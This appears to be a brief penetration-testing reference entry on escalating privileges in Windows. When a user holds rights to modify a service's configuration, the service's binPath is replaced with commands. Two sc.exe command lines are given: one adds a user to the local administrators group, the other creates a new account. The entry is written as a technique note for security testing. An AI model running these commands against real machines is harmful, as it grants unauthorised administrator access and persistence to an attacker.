description= ‘Abusing permissions over a service configuration’
The following actions require a set of conditions to be successful:
- GenericWrite / GenericAll / SERVICE_CHANGE_CONFIG Privileges on the service file
- Service is set to auto-start or we have permission to start/restart it
Check for permissions to modify service configuration #
Replace binPath of service with a command #
If you have permissions to change the configuration of a service, you can replace the path that points to the binary with a command. The typical POC is to add a user (usually one that we control) to the local admin group, or alternatively, create a new user and add it to the local admin group.
sc.exe config <service name> binPATH= "cmd.exe /c net localgroup administrators <User> /add"
sc.exe config <service name> binPATH= "cmd.exe /c net user <User> <Password>! /add"